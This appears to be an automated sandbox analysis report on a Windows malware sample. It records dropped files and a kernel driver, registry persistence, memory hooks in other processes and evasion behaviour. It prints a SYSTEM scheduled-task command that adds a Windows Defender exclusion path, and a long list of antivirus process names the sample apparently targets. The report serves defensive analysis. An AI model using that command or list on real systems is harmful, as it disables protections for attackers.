              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: tbcore3u.dll
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeSection loaded: apphelp.dll
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeSection loaded: tbcore3u.dll
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeSection loaded: tbcore3u.dll
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeSection loaded: tbcore3u.dll
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeFile written: C:\Users\Public\Music\destopbak.iniJump to behavior
              Source: 2749837485743-7684385786.05.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: 2749837485743-7684385786.05.exeStatic file information: File size 30885376 > 1048576
              Source: 2749837485743-7684385786.05.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1d59800
              Source: 2749837485743-7684385786.05.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: 7tqorj.exe, 00000007.00000003.2996806877.0000000003DF5000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000000.3231942330.0000000000818000.00000002.00000001.01000000.0000000A.sdmp, qNHTRl.exe, 00000029.00000002.3974096854.0000000000818000.00000002.00000001.01000000.0000000A.sdmp, qNHTRl.exe, 00000029.00000002.3974221880.00000000008BE000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 0000002A.00000002.3271497279.0000000000818000.00000002.00000001.01000000.0000000A.sdmp, qNHTRl.exe, 0000002A.00000000.3255146403.0000000000818000.00000002.00000001.01000000.0000000A.sdmp, NroRNr.exe, 0000002B.00000002.3272775080.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmp, NroRNr.exe, 0000002B.00000000.3258989374.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmp, NroRNr.exe, 0000002E.00000000.3388721194.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmp, NroRNr.exe, 0000002E.00000002.3399267881.0000000000FA8000.00000002.00000001.01000000.0000000C.sdmp, qNHTRl.exe, 0000002F.00000000.3395908790.0000000000818000.00000002.00000001.01000000.0000000A.sdmp, qNHTRl.exe, 0000002F.00000002.3402992961.0000000000818000.00000002.00000001.01000000.0000000A.sdmp
              Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
              Source: Binary string: R:\Everest\Tree\bin\WatersPrintCaptureProxy.pdb source: 2749837485743-7684385786.05.exe
              Source: Binary string: y:\avsdk5\user\make\build\public\64-bit\vseamps.pdb source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe, 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 7tqorj.exe, 00000005.00000000.2712564497.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 7tqorj.exe, 00000006.00000000.2722446315.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 7tqorj.exe, 00000006.00000002.2727976370.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 7tqorj.exe, 00000007.00000000.2792322207.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 7tqorj.exe.0.dr
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_000000014000F000
              Source: initial sampleStatic PE information: section where entry point is pointing to: .mo:
              Source: tbcore3U.dll.7.drStatic PE information: section name: .%?.
              Source: tbcore3U.dll.7.drStatic PE information: section name: .%-[
              Source: tbcore3U.dll.7.drStatic PE information: section name: .mo:
              Source: tbcore3U.dll.41.drStatic PE information: section name: .%?.
              Source: tbcore3U.dll.41.drStatic PE information: section name: .%-[
              Source: tbcore3U.dll.41.drStatic PE information: section name: .mo:
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeCode function: 43_2_00FA2691 push ecx; ret 43_2_00FA26A4

              Persistence and Installation Behavior

              barindex
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Users\user\Documents\7tqorj.exeJump to dropped file
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
              Source: C:\Users\user\Documents\7tqorj.exeFile created: C:\Program Files (x86)\qNHTRl\tbcore3U.dllJump to dropped file
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeFile created: C:\Program Files (x86)\2U36F\NroRNr.exeJump to dropped file
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
              Source: C:\Users\user\Documents\7tqorj.exeFile created: C:\Program Files (x86)\qNHTRl\qNHTRl.exeJump to dropped file
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Users\user\Documents\7tqorj.exeJump to dropped file
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeFile created: C:\Program Files (x86)\2U36F\tbcore3U.dllJump to dropped file
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file

              Boot Survival

              barindex
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeKey value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron GroupfenzhuJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeKey value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron GroupfenzhuJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeRegistry key created: HKEY_CURRENT_USER\System\CurrentControlSet\Services\SauronJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Users\user\Documents\7tqorj.exeMemory written: PID: 2544 base: 7FFDB4590008 value: E9 EB D9 E9 FF Jump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeMemory written: PID: 2544 base: 7FFDB442D9F0 value: E9 20 26 16 00 Jump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeMemory written: PID: 504 base: 7FFDB4590008 value: E9 EB D9 E9 FF Jump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeMemory written: PID: 504 base: 7FFDB442D9F0 value: E9 20 26 16 00 Jump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeMemory written: PID: 3476 base: 7FFDB4590008 value: E9 EB D9 E9 FF Jump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeMemory written: PID: 3476 base: 7FFDB442D9F0 value: E9 20 26 16 00 Jump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeMemory written: PID: 5052 base: D00005 value: E9 8B 2F 68 76 Jump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeMemory written: PID: 5052 base: 77382F90 value: E9 7A D0 97 89 Jump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeMemory written: PID: 5052 base: D20005 value: E9 8B 2F 66 76 Jump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeMemory written: PID: 5052 base: 77382F90 value: E9 7A D0 99 89 Jump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeMemory written: PID: 5032 base: A30005 value: E9 8B 2F 95 76
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeMemory written: PID: 5032 base: 77382F90 value: E9 7A D0 6A 89
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeMemory written: PID: 4800 base: F90005 value: E9 8B 2F 3F 76
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeMemory written: PID: 4800 base: 77382F90 value: E9 7A D0 C0 89
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeMemory written: PID: 7136 base: 1220005 value: E9 8B 2F 16 76
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeMemory written: PID: 7136 base: 77382F90 value: E9 7A D0 E9 89
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeMemory written: PID: 2104 base: 6F0005 value: E9 8B 2F C9 76
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeMemory written: PID: 2104 base: 77382F90 value: E9 7A D0 36 89
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 6C8C87AA
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 6C893E38
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 6C999F9E
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 6C91C0AF
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 6C89FFCB
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 6C965F8C
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 340FE84
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 34140CE
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 34FC5E8
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 33E10CD
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 3815654
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 34AA3BD
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 3445D5F
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 6C91183C
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 6C98CBDE
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 6C98B056
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeAPI/Special instruction interceptor: Address: 6C13A03F
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeAPI/Special instruction interceptor: Address: 6C24B056
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeAPI/Special instruction interceptor: Address: 6C1887AA
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeAPI/Special instruction interceptor: Address: 6C155143
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 6C90F839
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 6C878B19
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 6C8C87B1
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 6C9C6565
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeAPI/Special instruction interceptor: Address: 6C19080B
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeAPI/Special instruction interceptor: Address: 6C192089
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeAPI/Special instruction interceptor: Address: 6C286565
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeAPI/Special instruction interceptor: Address: 6C1D183C
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeAPI/Special instruction interceptor: Address: 6C1390FC
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 6C8790FC
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 6C97A702
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 6C8BF34F
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeAPI/Special instruction interceptor: Address: 6C15FFCB
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeAPI/Special instruction interceptor: Address: 6C297912
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeAPI/Special instruction interceptor: Address: 6C1887B1
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 6C9A6E74
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeAPI/Special instruction interceptor: Address: 6C8D2089
              Source: qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: {4E062DDA-444A-A2A8-84CE-E105F66A5AB3}SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEMCONSENTPROMPTBEHAVIORADMINSOFTWARE\PERFRPOOLSOFTWARE\PPFR49/56/235/24;9161POSTDATAC:\WINDOWS\SYSWOW64\DRIVERS\189ATOHCI.SYS360SAFE.EXE360SD.EXE360RP.EXE360RPS.EXESRAGENT.EXE360TRAY.EXEZHUDONGFANGYU.EXEKANKAN.EXESUPERKILLER.EXELIVEUPDATE360.EXEMODULEUPDATE.EXEFILESMASHER.EXEAGREEMENTVIEWER.EXESOFTMGRLITE.EXE360LEAKFIXER.EXE360SDRUN.EXE360SDUPD.EXE360FILEGUARD.EXEDEP360.EXEDUMPUPER.EXEDSMAIN.EXEDSMAIN64.EXEFIRSTAIDBOX.EXECHECKSM.EXEHIPSMAIN.EXEHIPSDAEMON.EXEHIPSTRAY.EXEHRUPDATE.EXEHIPSLOG.EXENETFLOW.EXEAUTORUNS.EXEUSYSDIAG.EXEWSCTRLSVC.EXEWSCTRL.EXEKXEMAIN.EXEKXESCORE.EXEKSCAN.EXEKXECENTER.EXEKXETRAY.EXEKDINFOMGR.EXEKISLIVE.EXEKNEWVIP.EXEKSOFTPURIFIER.EXEKTRASHAUTOCLEAN.EXEKAUTHORITYVIEW.EXETQCLIENT.EXETQEDRNAME.EXETQSAFEUI.EXETQTRAY.EXETRANTORAGENT.EXETQDEFENDER.EXETQUPDATEUI.EXETQWATERMARK.EXEDLPAPPDATA.EXENACLDIS.EXEMSMPENG.EXEMPCMDRUN.EXELDSHELPER.EXELDSSECURITY.EXELDSSECURITYAIDER.EXECOMPUTERZTRAY.EXECOMPUTERCENTER.EXEGUARDHP.EXECOMPUTERZ_CN.EXECOMPUTERZSERVICE.EXECOMPUTERZSERVICE_X64.EXEHDW_DISK_SCAN.EXECOMPUTERZMONHELPER.EXEDRVMGR.EXEWEB_HOST.EXE2345SAFECENTERSVC.EXE2345RTPROTECT.EXE2345SAFESVC.EXE2345MPCSAFE.EXE2345SAFETRAY.EXE2345SAFEUPDATE.EXE2345VIRUSSCAN.EXE2345MANUUPDATE.EXE2345ADRTPROTECT.EXE2345AUTHORITYPROTECT.EXE2345EXTSHELL.EXE2345EXTSHELL64.EXE2345FILESHRE.EXE2345LEAKFIXER.EXE2345LSPFIX.EXE2345PCSAFEBOOTASSISTANT.EXE2345RTPROTECTCENTER.EXE2345SHELLPRO.EXE2345SYSDOCTOR.EXELENOVOPCMANAGERSERVICE.EXELENOVOPCMANAGER.EXELAVSERVICE.EXELENOVOTRAY.EXELNVSVCFDN.EXEWSCTRL7.EXEWSCTRL10.EXEWSCTRL11.EXELENOVOAPPUPDATE.EXELENOVOAPPSTORE.EXEDESKTOPASSISTANTAPP.EXEDESKTOPASSISTANT.EXELENOVOMONITORMANAGER.EXELENOVOOKM.EXELEASHIVE.EXESTARTUPMANAGER.EXEWSPLUGINHOST.EXEWSPLUGINHOST64.EXECRASHPAD_HANDLER.EXESEARCHuser.EXELISFSERVICE.EXELSF.EXEAPPVANT.EXELENOVOINTERNETSOFTWAREFRAMEWORK.EXEEMDRIVERASSIST.EXELEAPPOM.EXEHOTFIXPLATFORM.EXEMSPCMANAGER.EXEMSPCMANAGERSERVICE.EXEAVP.EXEAVPUI.EXEAVASTSVC.EXEASWTOOLSSVC.EXEASWIDSAGENT.EXEWSC_PROXY.EXEAVASTUI.EXEAVIRA.SPOTLIGHT.SERVICE.EXEENDPOINTPROTECTION.EXESENTRYEYE.EXEAVIRA.SPOTLIGHT.COMMON.UPDATER.EXEAVIRA.SPOTLIGHT.FALLBACKUPDATER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.EXEAVIRA.SPOTLIGHT.SYSTRAY.APPLICATION.EXEAVIRA.OPTIMIZERHOST.EXEAVIRA.SPOTLIGHT.BOOTSTRAPPER.EXEAVIRA.SPOTLIGHT.SERVICE.WORKER.EXEAVIRA.SPOTLIGHT.COMMON.UPDATERTRACKER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.MESSAGING.EXEAVIRA.SPOTLIGHT.UI.ADMINISTRATIVERIGHTSPROVIDER.EXEMFEMMS.EXEMFEVTPS.EXEMCAPEXE.EXEMCSHIELD.EXEMCUICNT.EXEMFEAVSVC.EXENISSRV.EXESECURITYHEALTHSYSTRAY.EXEKWSPROTECT64.EXEQMDL.EXEQMPERSONALCENTER.EXEQQPCPATCH.EXEQQPCREALTIMESPEEDUP.EXEQQPCRTP.EXEQQPCTRAY.EXEQQREPAIR.EXEQQPCMGRUPDATE.EXEKSAFETRAY.EXEMPCOPYACCELERATOR.EXEUNTHREAT.EXEK7TSECURITY.EXEAD-WATCH.EXEPSAFESYSTRAY.EXEVSSERV.EXEREMUPD.EXERTVSCAN.EXEASHDISP.EXEAVCENTER.EXETMBMSRV.EXEKNSDTRAY.EXEV3SVC.EXEMSSECESS.EXEQUHLPSVC.EXERAVMOND.EXEKVMONXP.EXEBAIDUSAFETRAY.EXEBAIDUSD.EXEBKA.EXEBKA
              Source: qNHTRl.exe, 00000029.00000002.3976830327.000000000311D000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXE
